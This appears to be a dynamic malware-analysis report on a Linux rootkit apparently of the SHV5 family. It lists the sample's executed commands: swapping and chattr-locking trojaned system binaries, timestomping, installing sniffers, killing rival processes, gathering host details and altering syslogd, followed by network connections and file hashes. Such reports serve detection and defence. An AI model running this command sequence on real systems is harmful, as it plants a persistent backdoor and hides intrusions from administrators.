[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/cat

[cat /tmp/.procs]

/bin/rm

[rm -rf /tmp/.procs]

/bin/grep

[grep http]

/bin/grep

[grep 443]

/bin/cat

[cat /tmp/.stats]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/usr/bin/cut

[cut -c6-]

/usr/bin/awk

[awk -F {print $2} ]

/bin/grep

[grep inet addr:]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/hostname

[hostname -f]

/usr/bin/awk

[awk { print $11 }]

/bin/uname

[uname -a]

/bin/cat

[cat /tmp/info_tmp]

/usr/bin/awk

[awk {print $3}]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/hostname

[hostname -i]

/usr/bin/wc

[wc -l]

/bin/grep

[grep eth]

/sbin/ifconfig

[/sbin/ifconfig]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 14 - 12]

/usr/bin/head

[head -5]

/sbin/iptables

[/sbin/iptables -L input]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/var/cache/ldconfig/aux-cache~

MD5 52b4ccbad7807f5a2f34d1379dab1109
SHA1 fc15ce78d0bc4ae915b2ad57d4500d742d81ea44
SHA256 87070051536cd04382ef5585cf305cc95eb25910281f6b1201b3d22ee44bd0d9
SHA512 93f9112e421ee3472b29a42bca073c088f0b8948a8fdf092c38d9978c00e30f4bef474a2af27f468d5b8ee8d601c43588e8fe1e1c1cc874addcb590098298edb

/lib/libsh.so/bash

MD5 d5d689ba6020abe746c52ae7438d9eb2
SHA1 0a4ece3b3c332c39922b8d521c8f2087e9cf22b6
SHA256 15d4469eb3da716fefcc0c395a5b1d1657ad0555ec3ae623e727bb0dfcee19cf
SHA512 ae2459b496385844c20813e8fdc6c227facc6b16cd1bfcc467eb61309cb8316b5dc44d66c13de1a7a1c248a546654bc51128f6d1f2f8bb92f7e9f1898cec415e

/tmp/.init1

MD5 ba6ed6a3d425270d5374b0c2b54b3008
SHA1 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec
SHA256 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359
SHA512 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c

/tmp/.init1

MD5 0dae4739f83623a59236ecfabe00007b
SHA1 4b2b361ba9cf76213d2c4d6ba67e80099405f810
SHA256 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0
SHA512 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74

/tmp/.init1

MD5 21df30feebe94d25ce99e861e3642895
SHA1 3624439d7e9ac4463f83f1658205367ef27a2234
SHA256 d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5
SHA512 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb

/tmp/.init1

MD5 74e8461d4c9dd715082f15ef51e3ecac
SHA1 0504be0510ac79c4f7c8d5477032408f9b63a651
SHA256 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de
SHA512 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c

/tmp/.init1

MD5 8c053b4b674ebfcf6d38503608c5c8db
SHA1 9927d232e5bb15e3b6bbe461e0041d74649b963a
SHA256 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc
SHA512 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222

/usr/sbin/ttyload

MD5 b46702355aecfc0bd14c525655eccb8b
SHA1 85ae2258fdf63f04130470356e4d0ba13cce49b4
SHA256 d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7
SHA512 db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151

/usr/sbin/ttyload

MD5 53e75bf7964b0fb15cbe3028a151ed65
SHA1 116589e3b65166f73be2c6e8bb3b09c07641a762
SHA256 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805
SHA512 ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316

/tmp/.shmd5

MD5 e5f6d25a37ab24a48c82631b89bbad91
SHA1 bff487e8094ae83d1f22e9aa8c1299b18d5ee945
SHA256 8a0a7a94db129cb5992937e60ca4987517d47478ddb717cde31db4201e47f13e
SHA512 ca1a1d98c2774f6117001d76eaae5898754d2f72c58ad72e3bb295ee8fa36b9e3336a7193ab0384a2765fbc1a15f0de1280322687001e316c4fd0cdaf24093c1

/tmp/.shmd5

MD5 07bdf03254d1a560efa2e429faf99bc9
SHA1 14a6a0c13e10302d373fc7dd749bd02d826575ae
SHA256 6967fa87b368f071c4e0d20a9b3adc3f74b756a7823036dd63d0e21375b5c2df
SHA512 b53670afd1edfe47a68f265204a9254565245458f06e462827d176ddfd9db4b913f4b966e41f6e39469b668d29248c2a9823de033edf827a6a3c68ec719c4500

/tmp/.shmd5

MD5 fc6210437e7b99a1a011420086f448aa
SHA1 4b497f01d530ad73a0528de71e051bf4053c0b25
SHA256 3428f7d5cb668efc10039df2ff8106e99195a3d85218a639d781c5d78fcace75
SHA512 aeb3750a0aca0278713b742125cd5314dc10259c50467bc57a1ec644c9d04d3ea5c593fe6ff2d6f778fdec5888d92f4d2125c27c82ae083447d74c15377d15f9

/tmp/.shmd5

MD5 d8d06c72332be09ec7c8a4e8c2529ff4
SHA1 bdf65d9438688b9463e2fa0f272c38b00065efee
SHA256 cb7f119919564a298c23a3624b87f2ffd5b1c27a1d3a904cf922e13ad535bda5
SHA512 bde07e1b19be556b137e33ef0ded9b6a616a0ea24f2ca9a1655ff92a508115e7a21f103d13d89092e385a59ee93d78a44ee1b2f2322940829d9aa5d759bde729

/tmp/.shmd5

MD5 5c72f1a08578d9ad6a26bb64c5d4824d
SHA1 88bf94980645d88fbd704ebe93bda300641bfe84
SHA256 2063622ad7615f0c20e117e5c96a12b874d04d6b989008d7c4fb2ced71204217
SHA512 49879f21e66710496c034ecad2d3787b003d1a4b547858be4dbe8792fa14071df8911891bd468b3c7ea6396165e30dad497459597678f0a888b4a042f75f8064

/usr/lib/libsh/.backup/ps

MD5 558edc26f8a38fa9788220b9af8a73e7
SHA1 3024d44e580e9c67f32f6c585d50e2a6cc9a7cac
SHA256 b76435c80333d2c1fd18e0e7682f1c9dfb5da8d507e93e3c416f54b481c428d5
SHA512 edaa425b441044f015e8f68fffa1664e42372d00dd0e7b0924d24ce947aa8e5f96b3bdc326fa2f8b978e3fcf638a1ceca45a223735db73f1607df66990feb56f

/usr/lib/libsh/.backup/top

MD5 daf2cfb715d205893e4f6854282dad18
SHA1 939708b9e10f46934e31f91c915be71c7c491e61
SHA256 29615b5441c4ebdd6bb1e7e3301aa5f4313b326ee009645cef443fb7bab3e1e0
SHA512 9d96f140cd561f35edab13e960031f1475acd5c93d8f85dc8636f207a929952e3da9cb19086d673274edf944501b5026769b086fff2b875af2bc331882e8217d

/usr/lib/libsh/.backup/ls

MD5 931606baaa7a2b4ef61198406f8fc3f4
SHA1 d3a21675a8f19518d8b8f3cef0f6a21de1da6cc7
SHA256 0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c
SHA512 4be40f2440619e990897cf956c32800dc96c2c983bf64519854a3309fa5aa21827991559f9c44595098e27e6f2ee4d64a3fdec6baba8a177881f20e3ec61e26c

/usr/lib/libsh/.backup/find

MD5 f11b2b59639b1edcb46026472786c747
SHA1 a6fe59e11456bc7f19e28b38aa9c1f9c1a13b70d
SHA256 189fbf2416c8205430d8eaa85e2947bc15504ca335ad4a77ec668ff3cbf9c84a
SHA512 1967f43b4b274e2afbc30e8e1bad314085e488066b22233e6ec033dbae10ae111320296b9d429e94cb3079636a37e433aeac928b4ef23a56dedae1741815416b

/usr/lib/libsh/.backup/pstree

MD5 3dfdec02342af331dbaa70e8be88b988
SHA1 53810bd325c059930536467db0271fe41344dbdd
SHA256 3ebb6d41888a42802e43416e85fbece5f83bcf02dd1614d2933c766207c12a28
SHA512 909ca3af22ac9da7eb30f0a0929c6501f97d2188cb9257019e87222eba44dbf83b25735233b9b82bfa04b961761adad20bba4d394200caa00be0942e11183e5b

/usr/lib/libsh/.backup/md5sum

MD5 1f27bad424fa872edc3c2cfc50c4daa1
SHA1 0ca639850c9b1a9fc463c48d3229d9822fcc08fd
SHA256 331461536894ebf97e5d4115fc3ec4f33b207f3d2dde380adfdfc4edd8a258d2
SHA512 51c4e94f75da29867091ecada3fec0fd1c87b14b598323bad8ed52a9e0c5221de982a1ad99d272f92eb8fc43125c66227b937b3eb5f5ca621044ba70c607453c

/tmp/.procs

MD5 dbfab1026f0ecb2da80664aaaa4dc2df
SHA1 5f6ba72969e1537764225a7734dbe82803cab5ad
SHA256 5ffc23b653aca3456f8904805c49d763b4222af7b4d03b50d21f43bfcdc7a72f
SHA512 59110f203e31ec3a4a2d7c2ce9c7825cd4be49e176af02dbe75cb8d683cca324eeff132e9b61eac183cef73248115589bd8b02df9dc6f2418538464b26e48f14

/tmp/info_tmp

MD5 22ea01bf426fdae49b9b7cf004c6d4dd
SHA1 6131673bf21f62e30fc4cf309bcfa6f2f38ef0c5
SHA256 4c4a7bdb988f50b1955b22645128a7a689060d6e4cd69612b5c408728c65e6cf
SHA512 eeff1030deb87da71d05396e31a557b4b4318f7cd67e1660049b1502444dbacea928ceeeb3e6d453112d37780a1a3321b232dd291dcce50b6297cc478d70207a